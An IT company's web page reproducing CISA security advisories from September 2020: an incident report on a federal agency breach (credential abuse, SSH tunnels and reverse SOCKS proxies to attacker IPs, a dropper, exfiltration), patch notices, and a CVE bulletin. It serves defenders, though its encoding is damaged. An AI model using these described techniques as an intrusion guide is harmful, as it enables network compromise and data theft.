index_ label1 index_ label1
Providing services for federal, state and local government ...
index_ label2 index_ label2
Our commercial entity operations, providing enterprise services ...
index_ label3 index_ label3
How do we prepare for what's to come next? See inside ...
I.T. News
We are constantly interested in the latest and up-to-date technology.
As we move forward with the software development we will continue to use new technologies to improve our products and the customer experience. And we will continue to develop our solutions with both new functionality and increasing integration with the latest major platforms.

As the growing market shares and interests in the I.T. virtualization, we tailored the unique virtualization solution vFleXtor using proven, modern up-to-date technology.

Timely information about security topics and threats:

CISA All NCAS Products
  • Original release date: September 24, 2020

    CISA became aware?via EINSTEIN, CISA?s intrusion detection system that monitors federal civilian networks?of a potential compromise of a federal agency?s network. In coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity. The following information is derived exclusively from the incident response engagement and provides the threat actor?s tactics, techniques, and procedures as well as indicators of compromise that CISA observed as part of the engagement.

    Threat Actor Activity

    The cyber threat actor had valid access credentials for multiple users? Microsoft Office 365 (O365) accounts and domain administrator accounts, which they leveraged for Initial Access [TA0001] to the agency's network (Valid Accounts [T1078]). First the threat actor logged into a user?s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization?s virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).

    CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability?CVE-2019-11510?in Pulse Secure (Exploitation for Credential Access [T1212]). In April 2019, Pulse Secure released patches for several critical vulnerabilities?including CVE-2019-11510, which allows the remote, unauthenticated retrieval of files, including passwords.[1] CISA has observed wide exploitation of CVE-2019-11510 across the federal government.[2]

    After initial access, the threat actor performed Discovery [TA0007] by logging into an agency O365 email account from 91.219.236[.]166 and viewing and downloading help desk email attachments with ?Intranet access? and ?VPN passwords? in the subject line, despite already having privileged access (Email Collection [T1114], Unsecured Credentials: Credentials In Files [T1552.001]). (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address 207.220.1[.]3 (External Remote Services [T1133]). The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy (Account Manipulation [T1098]). Immediately afterward, the threat actor used common Microsoft Windows command line processes?conhost, ipconfig, net, query, netstat, ping, and whoami, plink.exe?to enumerate the compromised system and network (Command and Scripting Interpreter [T1059], System Network Configuration Discovery [T1016]).

    The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP 185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB share. The attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059]). (plink.exe is a command-line version of PuTTy that is used for remote administration.)

    The cyber threat actor established Persistence [TA0003] and Command and Control [TA0011] on the victim network by (1) creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, (2) running inetinfo.exe (a unique, multi-stage malware used to drop files), and (3) setting up a locally mounted remote share on IP address 78.27.70[.]237 (Proxy [T1090]). The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis. Refer to Threat Actor Malware section for more information about the SSH Tunnel/reverse SOCKS proxy and inetinfo.exe.

    The cyber threat actor created a local account, which they used for data Collection [TA0009], Exfiltration [TA0010], Persistence [TA0003], and Command and Control [TA0011] (Create Account [T1136]). The cyber threat actor used the local account to:

    • Browse directories on a victim file server (Data from Shared Network Drive [T1039]).
    • Copy a file from a user?s home directory to their locally mounted remote share (Data Staged [T1074]).
      • CISA analysts detected the cyber threat actor interacting with other files on users? home directories but could not confirm whether they were exfiltrated.
    • Create a reverse SMB SOCKS proxy that allowed connection between an cyber threat actor-controlled VPS and the victim organization?s file server (refer to Threat Actor Malware section for more information) (Proxy [T1090]).
    • Interact with PowerShell module Invoke-TmpDavFS.psm (refer to Threat Actor Malware section for more information).
    • Exfiltrate data from an account directory and file server directory using tsclient (tsclient is a Microsoft Windows Terminal Services client) (Data from Local System [T1005], Data from Network Shared Drive [T1039]).
    • Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.

    See figure 1 for the sequence of the cyber threat actor?s tactics and techniques.

    ?

    Figure 1: Cyber threat actor tactics and techniques

    Threat Actor Malware

    Persistent SSH Tunnel/Reverse SOCKS Proxy

    While logged in as ?Administrator,? the cyber threat actor created two Scheduled Tasks (see table 1) that worked in concert to establish a persistent SSH tunnel and reverse SOCKS proxy. The proxy allowed connections between an attacker-controlled remote server and one of the victim organization?s file servers (Scheduled Task/Job [T1053], Proxy [T1090]). The Reverse SOCKS Proxy communicated through port 8100 (Non-Standard Port [T1571]). This port is normally closed, but the attacker?s malware opened it.

    Table 1: Scheduled Tasks composing SSH tunnel and reverse SOCKS proxy

    Scheduled Task Description
    ShellExperienceHost.exe

    This task created a persistent SSH tunnel to attacker-controlled remote server 206.189.18[.]189 and employed port forwarding to allow connections from the remote server port 39999 to the victim file server through port 8100. This task was run daily.

    ShellExperienceHost.exe is a version of plink.exe, a command-line version of PuTTy that is used for remote administration.

    WinDiag.exe

    This task is a reverse SOCKS proxy that is preconfigured to bind to and listen on TCP port 8100. WinDiag.exe received responses through the SSH tunnel and forwarded the responses through port 8100 to the VPS IP address 185.193.127[.]17 over port 443. This task was run on boot.

    WinDiag.exe had compile information that matched the VPS login name

    Dropper Malware: inetinfo.exe

    The threat actor created a Scheduled Task to run inetinfo.exe (Scheduled Task/Job [T1053]). inetinfo.exe is a unique, multi-stage malware used to drop files (figure 2). It dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.

    ?

    Figure 2: Dropper malware inetinfo.exe

    The cyber threat actor was able to overcome the agency?s anti-malware protection, and inetinfo.exe escaped quarantine. CISA analysts determined that the cyber threat actor accessed the anti-malware product?s software license key and installation guide and then visited a directory used by the product for temporary file analysis. After accessing this directory, the cyber threat actor was able to run inetinfo.exe (Impair Defenses: Disable or Modify Tools [T1562.001]).

    Reverse SMB SOCKS Proxy

    PowerShell script HardwareEnumeration.ps1 created a reverse SMB SOCKS proxy that allowed connection between attacker-controlled VPS IP 185.193.127[.]18 and the victim organization?s file server over port 443 (Command and Scripting Interpreter: Power Shell [T1059.001], Proxy [T1090]). PowerShell script HardwareEnumeration.ps1 was executed daily via a Scheduled Task (Scheduled Task/Job [T1053]).

    HardwareEnumeration.ps1 is a copy of Invoke-SocksProxy.ps1, a free tool created and distributed by a security researcher on GitHub.[3] Invoke-SocksProxy.ps1 creates a reverse proxy from the local machine to attacker infrastructure through SMB TCP port 445 (Non-Standard Port [T1571]). The script was likely altered with the cyber threat actor?s configuration needs.

    PowerShell Module: invoke-TmpDavFS.psm

    invoke-TmpDavFS.psm is a PowerShell module that creates a Web Distributed Authoring and Versioning (WebDAV) server that can be mounted as a file system and communicates over TCP port 443 and TCP port 80. invoke-TmpDavFS.psm is distributed on GitHub.[4]

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 24, 2020

    The Cybersecurity and Infrastructure Security Agency (CISA) is aware of active exploitation of CVE-2020-1472, an elevation of privilege vulnerability in Microsoft?s Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. Applying patches from Microsoft?s August 2020 Security Advisory for CVE-2020-1472 can prevent exploitation of this vulnerability.

    CISA has released a patch validation script to detect unpatched Microsoft domain controllers. CISA urges administrators to patch all domain controllers immediately?until every domain controller is updated, the entire infrastructure remains vulnerable. Review the following resources for more information:

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 22, 2020

    Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisories for Firefox 81 and Firefox ESR 78.3 and apply the necessary updates.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 22, 2020 | Last revised: September 23, 2020

    This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CKŪ) framework. See the ATT&CK for Enterprise frameworks for all referenced threat actor techniques.

    This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions by the Multi-State Information Sharing & Analysis Center (MS-ISAC).

    CISA has observed a notable increase in the use of LokiBot malware by malicious cyber actors since July 2020. Throughout this period, CISA?s EINSTEIN Intrusion Detection System, which protects federal, civilian executive branch networks, has detected persistent malicious LokiBot activity. LokiBot uses a credential- and information-stealing malware, often sent as a malicious attachment and known for being simple, yet effective, making it an attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 22, 2020

    Google has updated the stable channel for Chrome to 85.0.4183.121 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the stable channel update and apply the necessary changes.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 21, 2020

    The Samba Team has released a security update to address a critical vulnerability?CVE-2020-1472?in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for CVE-2020-1472 and apply the necessary updates or workaround.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 21, 2020

     

    High Vulnerabilities

    Primary
    Vendor -- Product
    Description Published CVSS Score Source & Patch Info
    apache -- struts Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. 2020-09-14 7.5 CVE-2019-0230
    MISC
    dlink -- covr-2600r_firmware D-Link COVR-2600R and COVR-3902 Kit before 1.01b05Beta01 use hardcoded credentials for telnet connection, which allows unauthenticated attackers to gain privileged access to the router, and to extract sensitive data or modify the configuration. 2020-09-14 10 CVE-2018-20432
    MISC
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. BT manager allows attackers to bypass intended access restrictions on a certain mode. The LG ID is LVE-SMP-200021 (September 2020). 2020-09-11 7.5 CVE-2020-25283
    MISC
    google -- android An issue was discovered on LG mobile devices with Android OS 10 software. The lguicc software (for the LG Universal Integrated Circuit Card) allows attackers to bypass intended access restrictions on property values. The LG ID is LVE-SMP-200020 (September 2020). 2020-09-11 7.5 CVE-2020-25282
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows remote attackers to execute arbitrary code because of unsafe JSON deserialization. 2020-09-11 7.5 CVE-2020-25260
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It uses XML deserialization libraries in an unsafe manner. 2020-09-11 7.5 CVE-2020-25259
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It uses ASP.NET BinaryFormatter.Deserialize in a manner that allows attackers to transmit and execute bytecode in SOAP messages. 2020-09-11 7.5 CVE-2020-25258
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32 and 19.x through 19.8.9.1000. It allows SQL injection, as demonstrated by TestConnection_LocalOrLinkedServer, CreateFilterFriendlyView, or AddWorkViewLinkedServer. 2020-09-11 7.5 CVE-2020-25254
    MISC
    hyland -- onbase An issue was discovered in Hyland OnBase through 18.0.0.32. It allows SQL injection, as demonstrated by the TableName, ColumnName, Name, UserId, or Password parameter. 2020-09-11 7.5 CVE-2020-25253
    MISC
    ibm -- maximo_asset_management IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in Java. By sending specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 182396. 2020-09-15 9 CVE-2020-4521
    XF
    CONFIRM
    jenkins -- selection_tasks Jenkins Selection tasks Plugin 1.0 and earlier executes a user-specified program on the Jenkins controller, allowing attackers with Job/Configure permission to execute an arbitrary system command on the Jenkins controller as the OS user that the Jenkins process is running as. 2020-09-16 9 CVE-2020-2276
    MLIST
    CONFIRM
    lemonldap-ng -- lemonldap\ An issue was discovered in LemonLDAP::NG through 2.0.8, when NGINX is used. An attacker may bypass URL-based access control to protected Virtual Hosts by submitting a non-normalized URI. This also affects versions before 0.5.2 of the "Lemonldap::NG handler for Node.js" package. 2020-09-14 7.5 CVE-2020-24660
    CONFIRM
    CONFIRM
    MISC
    DEBIAN
    mcafee -- web_gateway Privilege Escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.1 allows authenticated user interface user with low permissions to change the system's root password via improper access controls in the user interface. 2020-09-15 7.7 CVE-2020-7293
    MISC
    mi -- r3600_firmware In Xiaomi router R3600 ROM version<1.0.66, filters in the set_WAN6 interface can be bypassed, causing remote code execution. The router administrator can gain root access from this vulnerability. 2020-09-11 10 CVE-2020-14100
    MISC
    mi -- xiaomi_ai_speaker_firmware Memory overflow in Xiaomi AI speaker Rom version <1.59.6 can happen when the speaker verifying a malicious firmware during OTA process. 2020-09-11 7.5 CVE-2020-14096
    MISC
    microsoft -- chakracore A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1172. 2020-09-11 7.6 CVE-2020-1180
    N/A
    microsoft -- chakracore A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1180. 2020-09-11 7.6 CVE-2020-1172
    N/A
    microsoft -- edge A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1172, CVE-2020-1180. 2020-09-11 9.3 CVE-2020-1057
    N/A
    microsoft -- exchange_server A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka 'Microsoft Exchange Server Remote Code Execution Vulnerability'. 2020-09-11 9 CVE-2020-16875
    MISC
    N/A
    microsoft -- visual_studio A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16856. 2020-09-11 9.3 CVE-2020-16874
    N/A
    microsoft -- visual_studio A remote code execution vulnerability exists in Visual Studio when it improperly handles objects in memory, aka 'Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16874. 2020-09-11 9.3 CVE-2020-16856
    N/A
    microsoft -- visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious 'package.json' file, aka 'Visual Studio JSON Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-16881
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Cryptographic Catalog Services improperly handle objects in memory, aka 'Windows Cryptographic Catalog Services Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0782
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1590
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Text Service Module improperly handles memory, aka 'Windows Text Service Module Remote Code Execution Vulnerability'. 2020-09-11 7.6 CVE-2020-0908
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1593. 2020-09-11 9.3 CVE-2020-1508
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka 'Microsoft Windows Codecs Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1129. 2020-09-11 9.3 CVE-2020-1319
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka 'GDI+ Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-1285
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1039. 2020-09-11 9.3 CVE-2020-1074
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1074. 2020-09-11 9.3 CVE-2020-1039
    N/A
    microsoft -- windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka 'Windows Camera Codec Pack Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-0997
    N/A
    MISC
    microsoft -- windows_10 A remote code execution vulnerability exists in the way that Microsoft COM for Windows handles objects in memory, aka 'Microsoft COM for Windows Remote Code Execution Vulnerability'. 2020-09-11 9.3 CVE-2020-0922
    N/A
    microsoft -- windows_10 A security feature bypass vulnerability exists in Windows Defender Application Control (WDAC) which could allow an attacker to bypass WDAC enforcement, aka 'Windows Defender Application Control Security Feature Bypass Vulnerability'. 2020-09-11 7.2 CVE-2020-0951
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Microsoft Windows processes group policy updates, aka 'Group Policy Elevation of Privilege Vulnerability'. 2020-09-11 9.3 CVE-2020-1013
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Shell infrastructure component improperly handles objects in memory, aka 'Shell infrastructure component Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0870
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1053. 2020-09-11 7.2 CVE-2020-1308
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1245
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when NTFS improperly checks access, aka 'NTFS Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0838
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1030
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0998
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-1034
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when Windows Modules Installer improperly handles objects in memory, aka 'Windows Modules Installer Elevation of Privilege Vulnerability'. 2020-09-11 7.2 CVE-2020-0911
    N/A
    microsoft -- windows_10 An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka 'Windows Storage Services Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1559. 2020-09-11 7.2 CVE-2020-0886
    N/A
    projectworlds -- house_rental Projectworlds House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability, allowing remote attackers to execute arbitrary code on the hosting webserver via a malicious index.php POST request. 2020-09-15 7.5 CVE-2020-23833
    MISC
    MISC
    MISC
    Back to top

     

    Medium Vulnerabilities

    Primary
    Vendor -- Product
    Description Published CVSS Score Source & Patch Info
    accesspressthemes -- wp_floating_menu Wordpress Plugin Store / AccessPress Themes WP Floating Menu V1.3.0 is affected by: Cross Site Scripting (XSS) via the id GET parameter. 2020-09-14 4.3 CVE-2020-25378
    MISC
    apache -- cocoon When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. 2020-09-11 5 CVE-2020-11991
    MISC
    apache -- struts An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload. 2020-09-14 5 CVE-2019-0233
    MISC
    argosoft -- mail_server ArGo Soft Mail Server 1.8.8.9 is affected by Cross Site Request Forgery (CSRF) for perform remote arbitrary code execution. The component is the Administration dashboard. When using admin/user credentials, if the admin/user admin opens a website with the malicious page that will run the CSRF. 2020-09-11 6.8 CVE-2020-23824
    MISC
    atlassian -- jira Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. 2020-09-17 5 CVE-2020-14181
    MISC
    blackcat-cms -- blackcat_cms An issue was discovered in BlackCat CMS v.1.3.6. There is a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution. 2020-09-15 6.8 CVE-2020-25453
    MISC
    bluetooth -- bluetooth_core_specification Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less. 2020-09-11 4.3 CVE-2020-15802
    MISC
    MISC
    codoforum -- codoforum Codoforum 4.8.3 allows HTML Injection in the 'admin dashboard Manage users Section.' 2020-09-14 4.3 CVE-2020-21845
    MISC
    MISC
    cryptsetup_project -- cryptsetup A vulnerability was found in upstream release cryptsetup-2.2.0 where, there's a bug in LUKS2 format validation code, that is effectively invoked on every device/image presenting itself as LUKS2 container. The bug is in segments validation code in file 'lib/luks2/luks2_json_metadata.c' in function hdr_validate_segments(struct crypt_device *cd, json_object *hdr_jobj) where the code does not check for possible overflow on memory allocation used for intervals array (see statement "intervals = malloc(first_backup * sizeof(*intervals));"). Due to the bug, library can be *tricked* to expect such allocation was successful but for far less memory then originally expected. Later it may read data FROM image crafted by an attacker and actually write such data BEYOND allocated memory. 2020-09-16 6.8 CVE-2020-14382
    MISC
    FEDORA
    UBUNTU
    ctolog -- thinkadmin ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. 2020-09-14 5 CVE-2020-25540
    MISC
    MISC
    MISC
    dataiku -- data_science_studio Dataiku DSS before 6.0.5 allows attackers write access to the project to modify the "Created by" metadata. 2020-09-14 5.5 CVE-2020-8817
    MISC
    CONFIRM
    ericsson -- rx8200_firmware Ericsson RX8200 5.13.3 devices are vulnerable to multiple reflected and stored XSS. An attacker has to inject JavaScript code directly in the "path" or "Services+ID" parameters and send the URL to a user in order to exploit reflected XSS. In the case of stored XSS, an attacker must modify the "name" parameter with the malicious code. 2020-09-14 4.3 CVE-2020-22158
    MISC
    gazie_project -- gazie Gazie 7.29 is affected by: Cross Site Scripting (XSS) via http://192.168.100.7/gazie/modules/config/admin_utente.php?user_name=amministratore&Update. An attacker can inject JavaScript code, and the webapplication stores the injected code. 2020-09-14 4.3 CVE-2020-21731
    MISC
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Under certain conditions GitLab was not properly revoking user sessions and allowed a malicious user to access a user account with an old password. 2020-09-14 6.5 CVE-2020-13302
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not validating a Deploy-Token and allowed a disabled repository be accessible via a git command line. 2020-09-14 4 CVE-2020-13316
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Project reporters and above could see confidential EPIC attached to confidential issues 2020-09-14 4 CVE-2020-13287
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. A user without 2 factor authentication enabled could be prohibited from accessing GitLab by being invited into a project that had 2 factor authentication inheritance. 2020-09-15 4 CVE-2020-13308
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. An unauthorized project maintainer could edit the subgroup badges due to the lack of authorization control. 2020-09-14 4 CVE-2020-13313
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Due to improper verification of permissions, an unauthorized user can access a private repository within a public project. 2020-09-15 4 CVE-2020-13303
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Wiki was vulnerable to a parser attack that prohibits anyone from accessing the Wiki functionality through the user interface. 2020-09-14 4 CVE-2020-13311
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab runner versions before 13.1.3, 13.2.3 and 13.3.1. It was possible to make the gitlab-runner process crash by sending malformed queries, resulting in a denial of service. 2020-09-14 4 CVE-2020-13310
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8, and 13.3.4. An insufficient check in the GraphQL api allowed a maintainer to delete a repository. 2020-09-14 4 CVE-2020-13317
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not invalidating project invitation link upon removing a user from a project. 2020-09-14 4 CVE-2020-13305
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. API Authorization Using Outdated CI Job Token 2020-09-14 5.5 CVE-2020-13284
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.0.12, 13.1.10, 13.2.8 and 13.3.4. GitLabs EKS integration was vulnerable to a cross-account assume role attack. 2020-09-14 4.9 CVE-2020-13318
    CONFIRM
    MISC
    gitlab -- gitlab GitLab before version 13.3.4 was vulnerable to an OAuth authorization scope change without user consent in the middle of the authorization flow. 2020-09-14 6.4 CVE-2020-13300
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. In certain cases an invalid username could be accepted when 2FA is activated. 2020-09-14 5.5 CVE-2020-13289
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab OAuth endpoint was vulnerable to brute-force attacks through a specific parameter. 2020-09-14 5 CVE-2020-13312
    CONFIRM
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab was not revoking current user sessions when 2 factor authentication was activated allowing a malicious user to maintain their access. 2020-09-15 6 CVE-2020-13307
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Omniauth endpoint allowed a malicious user to submit content to be displayed back to the user within error messages. 2020-09-14 5 CVE-2020-13314
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. The revocation feature was not revoking all session tokens and one could re-use it to obtain a valid session. 2020-09-14 5.5 CVE-2020-13299
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. When 2 factor authentication was enabled for groups, a malicious user could bypass that restriction by sending a specific query to the API endpoint. 2020-09-14 4.9 CVE-2020-13297
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. GitLab Webhook feature could be abused to perform denial of service attacks due to the lack of rate limitation. 2020-09-14 5 CVE-2020-13306
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Conan package upload functionality was not properly validating the supplied parameters, which resulted in the limited files disclosure. 2020-09-14 5 CVE-2020-13298
    CONFIRM
    MISC
    MISC
    gitlab -- gitlab A vulnerability was discovered in GitLab versions before 13.1.10, 13.2.8 and 13.3.4. Same 2 factor Authentication secret code was generated which resulted an attacker to maintain access under certain conditions. 2020-09-14 6.5 CVE-2020-13304
    CONFIRM
    MISC
    MISC
